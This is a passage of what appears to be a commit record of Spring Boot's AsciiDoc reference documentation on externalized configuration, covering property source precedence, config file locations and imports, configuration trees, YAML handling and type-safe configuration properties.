a bean definition called `configurationPropertiesValidator`.\nThe `@Bean` method should be declared `static`.\nThe configuration properties validator is created very early in the application's lifecycle, and declaring the `@Bean` method as static lets the bean be created without having to instantiate the `@Configuration` class.\nDoing so avoids any problems that may be caused by early instantiation.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all `@ConfigurationProperties` beans.\nPoint your web browser to `\/actuator\/configprops` or use the equivalent JMX endpoint.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation]]\n==== @ConfigurationProperties vs. @Value\nThe `@Value` annotation is a core container feature, and it does not provide the same features as type-safe configuration properties.\nThe following table summarizes the features that are supported by `@ConfigurationProperties` and `@Value`:\n\n[cols=\"4,2,2\"]\n|===\n| Feature |`@ConfigurationProperties` |`@Value`\n\n| <<features#features.external-config.typesafe-configuration-properties.relaxed-binding,Relaxed binding>>\n| Yes\n| Limited (see <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation.note,note below>>)\n\n| <<configuration-metadata#appendix.configuration-metadata,Meta-data support>>\n| Yes\n| No\n\n| `SpEL` evaluation\n| No\n| Yes\n|===\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation.note]]\n[NOTE]\n====\nIf you do want to use `@Value`, we recommend that you refer to property names using their canonical form (kebab-case using only lowercase letters).\nThis will allow Spring Boot to use the same logic as it does when <<features#features.external-config.typesafe-configuration-properties.relaxed-binding, relaxed binding>> `@ConfigurationProperties`.\n\nFor example, `@Value(\"{demo.item-price}\")` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.\nIf you used `@Value(\"{demo.itemPrice}\")` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.\n====\n\nIf you define a set of configuration keys for your own components, we recommend you group them in a POJO annotated with `@ConfigurationProperties`.\nDoing so will provide you with structured, type-safe object that you can inject into your own beans.\n\n`SpEL` expressions from <<features#features.external-config.files,application property files>> are not processed at time of parsing these files and populating the environment.\nHowever, it is possible to write a `SpEL` expression in `@Value`.\nIf the value of a property from an application property file is a `SpEL` expression, it will be evaluated when consumed through `@Value`.\n","old_contents":"[[features.external-config]]\n== Externalized Configuration\nSpring Boot lets you externalize your configuration so that you can work with the same application code in different environments.\nYou can use a variety of external configuration sources, include Java properties files, YAML files, environment variables, and command-line arguments.\n\nProperty values can be injected directly into your beans by using the `@Value` annotation, accessed through Spring's `Environment` abstraction, or be <<features#features.external-config.typesafe-configuration-properties,bound to structured objects>> through `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow sensible overriding of values.\nProperties are considered in the following order (with values from lower items overriding earlier ones):\n\n. Default properties (specified by setting `SpringApplication.setDefaultProperties`).\n. {spring-framework-api}\/context\/annotation\/PropertySource.html[`@PropertySource`] annotations on your `@Configuration` classes.\n Please note that such property sources are not added to the `Environment` until the application context is being refreshed.\n This is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n. Config data (such as `application.properties` files).\n. A `RandomValuePropertySource` that has properties only in `+random.*+`.\n. OS environment variables.\n. Java System properties (`System.getProperties()`).\n. JNDI attributes from `java:comp\/env`.\n. `ServletContext` init parameters.\n. `ServletConfig` init parameters.\n. Properties from `SPRING_APPLICATION_JSON` (inline JSON embedded in an environment variable or system property).\n. Command line arguments.\n. `properties` attribute on your tests.\n Available on {spring-boot-test-module-api}\/context\/SpringBootTest.html[`@SpringBootTest`] and the <<features#features.testing.spring-boot-applications.autoconfigured-tests,test annotations for testing a particular slice of your application>>.\n. {spring-framework-api}\/test\/context\/TestPropertySource.html[`@TestPropertySource`] annotations on your tests.\n. <<using#using.devtools.globalsettings,Devtools global settings properties>> in the `$HOME\/.config\/spring-boot` directory when devtools is active.\n\nConfig data files are considered in the following order:\n\n. <<features#features.external-config.files,Application properties>> packaged inside your jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> packaged inside your jar (`application-\\{profile}.properties` and YAML variants).\n. <<features#features.external-config.files,Application properties>> outside of your packaged jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> outside of your packaged jar (`application-\\{profile}.properties` and YAML variants).\n\nNOTE: It is recommended to stick with one format for your entire application.\nIf you have configuration files with both `.properties` and `.yml` format in the same location, `.properties` takes precedence.\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a `name` property, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/MyBean.java[]\n----\n\nOn your application classpath (for example, inside your jar) you can have an `application.properties` file that provides a sensible default property value for `name`.\nWhen running in a new environment, an `application.properties` file can be provided outside of your jar that overrides the `name`.\nFor one-off testing, you can launch with a specific command line switch (for example, `java -jar app.jar --name=\"Spring\"`).\n\nTIP: The `env` and `configprops` endpoints can be useful in determining why a property has a particular value.\nYou can use these two endpoints to diagnose unexpected property values.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.command-line-args]]\n=== Accessing Command Line Properties\nBy default, `SpringApplication` converts any command line option arguments (that is, arguments starting with `--`, such as `--server.port=9000`) to a `property` and adds them to the Spring `Environment`.\nAs mentioned previously, command line properties always take precedence over file-based property sources.\n\nIf you do not want command line properties to be added to the `Environment`, you can disable them by using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[features.external-config.application-json]]\n=== JSON Application Properties\nEnvironment variables and system properties often have restrictions that mean some property names cannot be used.\nTo help with this, Spring Boot allows you to encode a block of properties into a single JSON structure.\n\nWhen your application starts, any `spring.application.json` or `SPRING_APPLICATION_JSON` properties will be parsed and added to the `Environment`.\n\nFor example, the `SPRING_APPLICATION_JSON` property can be supplied on the command line in a UN{asterisk}X shell as an environment variable:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ SPRING_APPLICATION_JSON='{\"my\":{\"name\":\"test\"}}' java -jar myapp.jar\n----\n\nIn the preceding example, you end up with `my.name=test` in the Spring `Environment`.\n\nThe same JSON can also be provided as a system property:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -Dspring.application.json='{\"my\":{\"name\":\"test\"}}' -jar myapp.jar\n----\n\nOr you could supply the JSON by using a command line argument:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myapp.jar --spring.application.json='{\"my\":{\"name\":\"test\"}}'\n----\n\nIf you are deploying to a classic Application Server, you could also use a JNDI variable named `java:comp\/env\/spring.application.json`.\n\nNOTE: Although `null` values from the JSON will be added to the resulting property source, the `PropertySourcesPropertyResolver` treats `null` properties as missing values.\nThis means that the JSON cannot override properties from lower order property sources with a `null` value.\n\n\n\n[[features.external-config.files]]\n=== External Application Properties [[features.external-config.files]]\nSpring Boot will automatically find and load `application.properties` and `application.yaml` files from the following locations when your application starts:\n\n. From the classpath\n.. The classpath root\n.. The classpath `\/config` package\n. From the current directory\n.. The current directory\n.. The `\/config` subdirectory in the current directory\n.. Immediate child directories of the `\/config` subdirectory\n\nThe list is ordered by precedence (with values from lower items overriding earlier ones).\nDocuments from the loaded files are added as `PropertySources` to the Spring `Environment`.\n\nIf you do not like `application` as the configuration file name, you can switch to another file name by specifying a configprop:spring.config.name[] environment property.\nFor example, to look for `myproject.properties` and `myproject.yaml` files you can run your application as follows:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nYou can also refer to an explicit location by using the configprop:spring.config.location[] environment property.\nThis property accepts a comma-separated list of one or more locations to check.\n\nThe following example shows how to specify two distinct files:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.location=\\\n\t\toptional:classpath:\/default.properties,\\\n\t\toptional:classpath:\/override.properties\n----\n\nTIP: Use the prefix `optional:` if the <<features#features.external-config.files.optional-prefix,locations are optional>> and you do not mind if they do not exist.\n\nWARNING: `spring.config.name`, `spring.config.location`, and `spring.config.additional-location` are used very early to determine which files have to be loaded.\nThey must be defined as an environment property (typically an OS environment variable, a system property, or a command-line argument).\n\nIf `spring.config.location` contains directories (as opposed to files), they should end in `\/`.\nAt runtime they will be appended with the names generated from `spring.config.name` before being loaded.\nFiles specified in `spring.config.location` are imported directly.\n\nNOTE: Both directory and file location values are also expanded to check for <<features#features.external-config.files.profile-specific,profile-specific files>>.\nFor example, if you have a `spring.config.location` of `classpath:myconfig.properties`, you will also find appropriate `classpath:myconfig-<profile>.properties` files are loaded.\n\nIn most situations, each configprop:spring.config.location[] item you add will reference a single file or directory.\nLocations are processed in the order that they are defined and later ones can override the values of earlier ones.\n\n[[features.external-config.files.location-groups]]\nIf you have a complex location setup, and you use profile-specific configuration files, you may need to provide further hints so that Spring Boot knows how they should be grouped.\nA location group is a collection of locations that are all considered at the same level.\nFor example, you might want to group all classpath locations, then all external locations.\nItems within a location group should be separated with `;`.\nSee the example in the \"`<<features#features.external-config.files.profile-specific>>`\" section for more details.\n\nLocations configured by using `spring.config.location` replace the default locations.\nFor example, if `spring.config.location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nIf you prefer to add additional locations, rather than replacing them, you can use `spring.config.additional-location`.\nProperties loaded from additional locations can override those in the default locations.\nFor example, if `spring.config.additional-location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:\/;optional:classpath:\/config\/`\n. `optional:file:.\/;optional:file:.\/config\/;optional:file:.\/config\/*\/`\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nThis search ordering lets you specify default values in one configuration file and then selectively override those values in another.\nYou can provide default values for your application in `application.properties` (or whatever other basename you choose with `spring.config.name`) in one of the default locations.\nThese default values can then be overridden at runtime with a different file located in one of the custom locations.\n\nNOTE: If you use environment variables rather than system properties, most operating systems disallow period-separated key names, but you can use underscores instead (for example, configprop:spring.config.name[format=envvar] instead of configprop:spring.config.name[]).\nSee <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>> for details.\n\nNOTE: If your application runs in a servlet container or application server, then JNDI properties (in `java:comp\/env`) or servlet context initialization parameters can be used instead of, or as well as, environment variables or system properties.\n\n\n\n[[features.external-config.files.optional-prefix]]\n==== Optional Locations\nBy default, when a specified config data location does not exist, Spring Boot will throw a `ConfigDataLocationNotFoundException` and your application will not start.\n\nIf you want to specify a location, but you do not mind if it does not always exist, you can use the `optional:` prefix.\nYou can use this prefix with the `spring.config.location` and `spring.config.additional-location` properties, as well as with <<features#features.external-config.files.importing, `spring.config.import`>> declarations.\n\nFor example, a `spring.config.import` value of `optional:file:.\/myconfig.properties` allows your application to start, even if the `myconfig.properties` file is missing.\n\nIf you want to ignore all `ConfigDataLocationNotFoundExceptions` and always continue to start your application, you can use the `spring.config.on-not-found` property.\nSet the value to `ignore` using `SpringApplication.setDefaultProperties(...)` or with a system\/environment variable.\n\n\n\n[[features.external-config.files.wildcard-locations]]\n==== Wildcard Locations\nIf a config file location includes the `{asterisk}` character for the last path segment, it is considered a wildcard location.\nWildcards are expanded when the config is loaded so that immediate subdirectories are also checked.\nWildcard locations are particularly useful in an environment such as Kubernetes when there are multiple sources of config properties.\n\nFor example, if you have some Redis configuration and some MySQL configuration, you might want to keep those two pieces of configuration separate, while requiring that both those are present in an `application.properties` file.\nThis might result in two separate `application.properties` files mounted at different locations such as `\/config\/redis\/application.properties` and `\/config\/mysql\/application.properties`.\nIn such a case, having a wildcard location of `config\/*\/`, will result in both files being processed.\n\nBy default, Spring Boot includes `config\/*\/` in the default search locations.\nIt means that all subdirectories of the `\/config` directory outside of your jar will be searched.\n\nYou can use wildcard locations yourself with the `spring.config.location` and `spring.config.additional-location` properties.\n\nNOTE: A wildcard location must contain only one `{asterisk}` and end with `{asterisk}\/` for search locations that are directories or `*\/<filename>` for search locations that are files.\nLocations with wildcards are sorted alphabetically based on the absolute path of the file names.\n\nTIP: Wildcard locations only work with external directories.\nYou cannot use a wildcard in a `classpath:` location.\n\n\n\n[[features.external-config.files.profile-specific]]\n==== Profile Specific Files\nAs well as `application` property files, Spring Boot will also attempt to load profile-specific files using the naming convention `application-\\{profile}`.\nFor example, if your application activates a profile named `prod` and uses YAML files, then both `application.yml` and `application-prod.yml` will be considered.\n\nProfile-specific properties are loaded from the same locations as standard `application.properties`, with profile-specific files always overriding the non-specific ones.\nIf several profiles are specified, a last-wins strategy applies.\nFor example, if profiles `prod,live` are specified by the configprop:spring.profiles.active[] property, values in `application-prod.properties` can be overridden by those in `application-live.properties`.\n\n[NOTE]\n====\nThe last-wins strategy applies at the <<features#features.external-config.files.location-groups,location group>> level.\nA configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` will not have the same override rules as `classpath:\/cfg\/;classpath:\/ext\/`.\n\nFor example, continuing our `prod,live` example above, we might have the following files:\n\n----\n\/cfg\n application-live.properties\n\/ext\n application-live.properties\n application-prod.properties\n----\n\nWhen we have a configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` we process all `\/cfg` files before all `\/ext` files:\n\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-prod.properties`\n. `\/ext\/application-live.properties`\n\n\nWhen we have `classpath:\/cfg\/;classpath:\/ext\/` instead (with a `;` delimiter) we process `\/cfg` and `\/ext` at the same level:\n\n. `\/ext\/application-prod.properties`\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-live.properties`\n====\n\nThe `Environment` has a set of default profiles (by default, `[default]`) that are used if no active profiles are set.\nIn other words, if no profiles are explicitly activated, then properties from `application-default` are considered.\n\nNOTE: Properties files are only ever loaded once.\nIf you have already directly <<features#features.external-config.files.importing,imported>> a profile specific property files then it will not be imported a second time.\n\n\n\n[[features.external-config.files.importing]]\n==== Importing Additional Data\nApplication properties may import further config data from other locations using the `spring.config.import` property.\nImports are processed as they are discovered, and are treated as additional documents inserted immediately below the one that declares the import.\n\nFor example, you might have the following in your classpath `application.properties` file:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t application:\n\t name: \"myapp\"\n\t config:\n\t import: \"optional:file:.\/dev.properties\"\n----\n\nThis will trigger the import of a `dev.properties` file in current directory (if such a file exists).\nValues from the imported `dev.properties` will take precedence over the file that triggered the import.\nIn the above example, the `dev.properties` could redefine `spring.application.name` to a different value.\n\nAn import will only be imported once no matter how many times it is declared.\nThe order an import is defined inside a single document within the properties\/yaml file does not matter.\nFor instance, the two examples below produce the same result:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t config:\n\t import: \"my.properties\"\n\tmy:\n\t property: \"value\"\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t property: \"value\"\n\tspring:\n\t config:\n\t import: \"my.properties\"\n----\n\nIn both of the above examples, the values from the `my.properties` file will take precedence over the file that triggered its import.\n\nSeveral locations can be specified under a single `spring.config.import` key.\nLocations will be processed in the order that they are defined, with later imports taking precedence.\n\nNOTE: When appropriate, <<features#features.external-config.files.profile-specific, Profile-specific variants>> are also considered for import.\nThe example above would import both `my.properties` as well as any `my-<profile>.properties` variants.\n\n[TIP]\n====\nSpring Boot includes pluggable API that allows various different location addresses to be supported.\nBy default you can import Java Properties, YAML and \"`<<features#features.external-config.files.configtree, configuration trees>>`\".\n\nThird-party jars can offer support for additional technologies (there is no requirement for files to be local).\nFor example, you can imagine config data being from external stores such as Consul, Apache ZooKeeper or Netflix Archaius.\n\nIf you want to support your own locations, see the `ConfigDataLocationResolver` and `ConfigDataLoader` classes in the `org.springframework.boot.context.config` package.\n====\n\n\n\n[[features.external-config.files.importing-extensionless]]\n==== Importing Extensionless Files\nSome cloud platforms cannot add a file extension to volume mounted files.\nTo import these extensionless files, you need to give Spring Boot a hint so that it knows how to load them.\nYou can do this by putting an extension hint in square brackets.\n\nFor example, suppose you have a `\/etc\/config\/myconfig` file that you wish to import as yaml.\nYou can import it from your `application.properties` using the following:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"file:\/etc\/config\/myconfig[.yaml]\"\n----\n\n\n\n[[features.external-config.files.configtree]]\n==== Using Configuration Trees\nWhen running applications on a cloud platform (such as Kubernetes) you often need to read config values that the platform supplies.\nIt is not uncommon to use environment variables for such purposes, but this can have drawbacks, especially if the value is supposed to be kept secret.\n\nAs an alternative to environment variables, many cloud platforms now allow you to map configuration into mounted data volumes.\nFor example, Kubernetes can volume mount both https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#populate-a-volume-with-data-stored-in-a-configmap[`ConfigMaps`] and https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#using-secrets-as-files-from-a-pod[`Secrets`].\n\nThere are two common volume mount patterns that can be used:\n\n. A single file contains a complete set of properties (usually written as YAML).\n. Multiple files are written to a directory tree, with the filename becoming the '`key`' and the contents becoming the '`value`'.\n\nFor the first case, you can import the YAML or Properties file directly using `spring.config.import` as described <<features#features.external-config.files.importing,above>>.\nFor the second case, you need to use the `configtree:` prefix so that Spring Boot knows it needs to expose all the files as properties.\n\nAs an example, let's imagine that Kubernetes has mounted the following volume:\n\n[indent=0]\n----\n\tetc\/\n\t config\/\n\t myapp\/\n\t username\n\t password\n----\n\nThe contents of the `username` file would be a config value, and the contents of `password` would be a secret.\n\nTo import these properties, you can add the following to your `application.properties` or `application.yaml` file:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/etc\/config\/\"\n----\n\nYou can then access or inject `myapp.username` and `myapp.password` properties from the `Environment` in the usual way.\n\nTIP: The folders under the config tree form the property name.\nIn the above example, to access the properties as `username` and `password`, you can set `spring.config.import` to `optional:configtree:\/etc\/config\/myapp`.\n\nNOTE: Filenames with dot notation are also correctly mapped.\nFor example, in the above example, a file named `myapp.username` in `\/etc\/config` would result in a `myapp.username` property in the `Environment`.\n\nTIP: Configuration tree values can be bound to both string `String` and `byte[]` types depending on the contents expected.\n\nIf you have multiple config trees to import from the same parent folder you can use a wildcard shortcut.\nAny `configtree:` location that ends with `\/*\/` will import all immediate children as config trees.\n\nFor example, given the following volume:\n\n[indent=0]\n----\n\tetc\/\n\t config\/\n\t dbconfig\/\n\t db\/\n\t username\n\t password\n\t mqconfig\/\n\t mq\/\n\t username\n\t password\n----\n\nYou can use `configtree:\/etc\/config\/*\/` as the import location:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/etc\/config\/*\/\"\n----\n\nThis will add `db.username`, `db.password`, `mq.username` and `mq.password` properties.\n\nNOTE: Directories loaded using a wildcard are sorted alphabetically.\nIf you need a different order, then you should list each location as a separate import\n\n\nConfiguration trees can also be used for Docker secrets.\nWhen a Docker swarm service is granted access to a secret, the secret gets mounted into the container.\nFor example, if a secret named `db.password` is mounted at location `\/run\/secrets\/`, you can make `db.password` available to the Spring environment using the following:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/run\/secrets\/\"\n----\n\n\n\n[[features.external-config.files.property-placeholders]]\n==== Property Placeholders\nThe values in `application.properties` and `application.yml` are filtered through the existing `Environment` when they are used, so you can refer back to previously defined values (for example, from System properties or environment variables).\nThe standard `$\\{name}` property-placeholder syntax can be used anywhere within a value.\nProperty placeholders can also specify a default value using a `:` to separate the default value from the property name, for example `${name:default}`.\n\nThe use of placeholders with and without defaults is shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tapp:\n\t name: \"MyApp\"\n\t description: \"${app.name} is a Spring Boot application written by ${username:Unknown}\"\n----\n\nAssuming that the `username` property has not been set elsewhere, `app.description` will have the value `MyApp is a Spring Boot application written by Unknown`.\n\nTIP: You can also use this technique to create \"`short`\" variants of existing Spring Boot properties.\nSee the _<<howto#howto.properties-and-configuration.short-command-line-arguments>>_ how-to for details.\n\n\n\n[[features.external-config.files.multi-document]]\n==== Working with Multi-Document Files\nSpring Boot allows you to split a single physical file into multiple logical documents which are each added independently.\nDocuments are processed in order, from top to bottom.\nLater documents can override the properties defined in earlier ones.\n\nFor `application.yml` files, the standard YAML multi-document syntax is used.\nThree consecutive hyphens represent the end of one document, and the start of the next.\n\nFor example, the following file has two logical documents:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tspring:\n\t application:\n\t name: \"MyApp\"\n\t---\n\tspring:\n\t application:\n\t name: \"MyCloudApp\"\n\t config:\n\t activate:\n\t on-cloud-platform: \"kubernetes\"\n----\n\nFor `application.properties` files a special `#---` comment is used to mark the document splits:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.application.name=MyApp\n\t#---\n\tspring.application.name=MyCloudApp\n\tspring.config.activate.on-cloud-platform=kubernetes\n----\n\nNOTE: Property file separators must not have any leading whitespace and must have exactly three hyphen characters.\nThe lines immediately before and after the separator must not be comments.\n\nTIP: Multi-document property files are often used in conjunction with activation properties such as `spring.config.activate.on-profile`.\nSee the <<features#features.external-config.files.activation-properties, next section>> for details.\n\nWARNING: Multi-document property files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\n\n\n\n[[features.external-config.files.activation-properties]]\n==== Activation Properties\nIt is sometimes useful to only activate a given set of properties when certain conditions are met.\nFor example, you might have properties that are only relevant when a specific profile is active.\n\nYou can conditionally activate a properties document using `spring.config.activate.*`.\n\nThe following activation properties are available:\n\n.activation properties\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `on-profile`\n| A profile expression that must match for the document to be active.\n\n| `on-cloud-platform`\n| The `CloudPlatform` that must be detected for the document to be active.\n|===\n\nFor example, the following specifies that the second document is only active when running on Kubernetes, and only when either the \"`prod`\" or \"`staging`\" profiles are active:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmyprop:\n\t \"always-set\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-cloud-platform: \"kubernetes\"\n\t on-profile: \"prod | staging\"\n\tmyotherprop: \"sometimes-set\"\n----\n\n\n\n[[features.external-config.encrypting]]\n=== Encrypting Properties\nSpring Boot does not provide any built in support for encrypting property values, however, it does provide the hook points necessary to modify values contained in the Spring `Environment`.\nThe `EnvironmentPostProcessor` interface allows you to manipulate the `Environment` before the application starts.\nSee <<howto#howto.application.customize-the-environment-or-application-context>> for details.\n\nIf you need a secure way to store credentials and passwords, the https:\/\/cloud.spring.io\/spring-cloud-vault\/[Spring Cloud Vault] project provides support for storing externalized configuration in https:\/\/www.vaultproject.io\/[HashiCorp Vault].\n\n\n\n[[features.external-config.yaml]]\n=== Working with YAML\nhttps:\/\/yaml.org[YAML] is a superset of JSON and, as such, is a convenient format for specifying hierarchical configuration data.\nThe `SpringApplication` class automatically supports YAML as an alternative to properties whenever you have the https:\/\/bitbucket.org\/asomov\/snakeyaml[SnakeYAML] library on your classpath.\n\nNOTE: If you use \"`Starters`\", SnakeYAML is automatically provided by `spring-boot-starter`.\n\n\n\n[[features.external-config.yaml.mapping-to-properties]]\n==== Mapping YAML to Properties\nYAML documents need to be converted from their hierarchical format to a flat structure that can be used with the Spring `Environment`.\nFor example, consider the following YAML document:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tenvironments:\n\t dev:\n\t url: \"https:\/\/dev.example.com\"\n\t name: \"Developer Setup\"\n\t prod:\n\t url: \"https:\/\/another.example.com\"\n\t name: \"My Cool App\"\n----\n\nIn order to access these properties from the `Environment`, they would be flattened as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tenvironments.dev.url=https:\/\/dev.example.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=https:\/\/another.example.com\n\tenvironments.prod.name=My Cool App\n----\n\nLikewise, YAML lists also need to be flattened.\nThey are represented as property keys with `[index]` dereferencers.\nFor example, consider the following YAML:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\t my:\n\t servers:\n\t - \"dev.example.com\"\n\t - \"another.example.com\"\n----\n\nThe preceding example would be transformed into these properties:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tmy.servers[0]=dev.example.com\n\tmy.servers[1]=another.example.com\n----\n\nTIP: Properties that use the `[index]` notation can be bound to Java `List` or `Set` objects using Spring Boot's `Binder` class.\nFor more details see the \"`<<features#features.external-config.typesafe-configuration-properties>>`\" section below.\n\nWARNING: YAML files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\nSo, in the case that you need to load values that way, you need to use a properties file.\n\n\n\n[[features.external-config.yaml.directly-loading]]\n[[features.external-config.yaml.directly-loading]]\n==== Directly Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` loads YAML as `Properties` and the `YamlMapFactoryBean` loads YAML as a `Map`.\n\nYou can also use the `YamlPropertySourceLoader` class if you want to load YAML as a Spring `PropertySource`.\n\n\n\n[[features.external-config.random-values]]\n=== Configuring Random Values\nThe `RandomValuePropertySource` is useful for injecting random values (for example, into secrets or test cases).\nIt can produce integers, longs, uuids, or strings, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t secret: \"${random.value}\"\n\t number: \"${random.int}\"\n\t bignumber: \"${random.long}\"\n\t uuid: \"${random.uuid}\"\n\t number-less-than-ten: \"${random.int(10)}\"\n\t number-in-range: \"${random.int[1024,65536]}\"\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any character and `value,max` are integers.\nIf `max` is provided, then `value` is the minimum value and `max` is the maximum value (exclusive).\n\n\n\n[[features.external-config.system-environment]]\n=== Configuring System Environment Properties\nSpring Boot supports setting a prefix for environment properties.\nThis is useful if the system environment is shared by multiple Spring Boot applications with different configuration requirements.\nThe prefix for system environment properties can be set directly on `SpringApplication`.\n\nFor example, if you set the prefix to `input`, a property such as `remote.timeout` will also be resolved as `input.remote.timeout` in the system environment.\n\n\n\n[[features.external-config.typesafe-configuration-properties]]\n=== Type-safe Configuration Properties\nUsing the `@Value(\"$\\{property}\")` annotation to inject configuration properties can sometimes be cumbersome, especially if you are working with multiple properties or your data is hierarchical in nature.\nSpring Boot provides an alternative method of working with properties that lets strongly typed beans govern and validate the configuration of your application.\n\nTIP: See also the <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation,differences between `@Value` and type-safe configuration properties>>.\n\n\n\n[[features.external-config.typesafe-configuration-properties.java-bean-binding]]\n==== JavaBean properties binding\nIt is possible to bind a bean declaring standard JavaBean properties as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/javabeanbinding\/MyProperties.java[]\n----\n\nThe preceding POJO defines the following properties:\n\n* `my.service.enabled`, with a value of `false` by default.\n* `my.service.remote-address`, with a type that can be coerced from `String`.\n* `my.service.security.username`, with a nested \"security\" object whose name is determined by the name of the property.\n In particular, the type is not used at all there and could have been `SecurityProperties`.\n* `my.service.security.password`.\n* `my.service.security.roles`, with a collection of `String` that defaults to `USER`.\n\nNOTE: The properties that map to `@ConfigurationProperties` classes available in Spring Boot, which are configured through properties files, YAML files, environment variables, and other mechanisms, are public API but the accessors (getters\/setters) of the class itself are not meant to be used directly.\n\n[NOTE]\n====\nSuch arrangement relies on a default empty constructor and getters and setters are usually mandatory, since binding is through standard Java Beans property descriptors, just like in Spring MVC.\nA setter may be omitted in the following cases:\n\n* Maps, as long as they are initialized, need a getter but not necessarily a setter, since they can be mutated by the binder.\n* Collections and arrays can be accessed either through an index (typically with YAML) or by using a single comma-separated value (properties).\n In the latter case, a setter is mandatory.\n We recommend to always add a setter for such types.\n If you initialize a collection, make sure it is not immutable (as in the preceding example).\n* If nested POJO properties are initialized (like the `Security` field in the preceding example), a setter is not required.\n If you want the binder to create the instance on the fly by using its default constructor, you need a setter.\n\nSome people use Project Lombok to add getters and setters automatically.\nMake sure that Lombok does not generate any particular constructor for such a type, as it is used automatically by the container to instantiate the object.\n\nFinally, only standard Java Bean properties are considered and binding on static properties is not supported.\n====\n\n\n\n[[features.external-config.typesafe-configuration-properties.constructor-binding]]\n==== Constructor binding\nThe example in the previous section can be rewritten in an immutable fashion as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/MyProperties.java[]\n----\n\nIn this setup, the `@ConstructorBinding` annotation is used to indicate that constructor binding should be used.\nThis means that the binder will expect to find a constructor with the parameters that you wish to have bound.\nIf you are using Java 16 or later, constructor binding can be used with records.\nIn this case, unless your record has multiple constructors, there is no need to use `@ConstructorBinding`.\n\nNested members of a `@ConstructorBinding` class (such as `Security` in the example above) will also be bound through their constructor.\n\nDefault values can be specified using `@DefaultValue` on a constructor parameter or, when using Java 16 or later, a record component.\nThe conversion service will be applied to coerce the `String` value to the target type of a missing property.\n\nReferring to the previous example, if no properties are bound to `Security`, the `MyProperties` instance will contain a `null` value for `security`.\nIf you wish you return a non-null instance of `Security` even when no properties are bound to it, you can use an empty `@DefaultValue` annotation to do 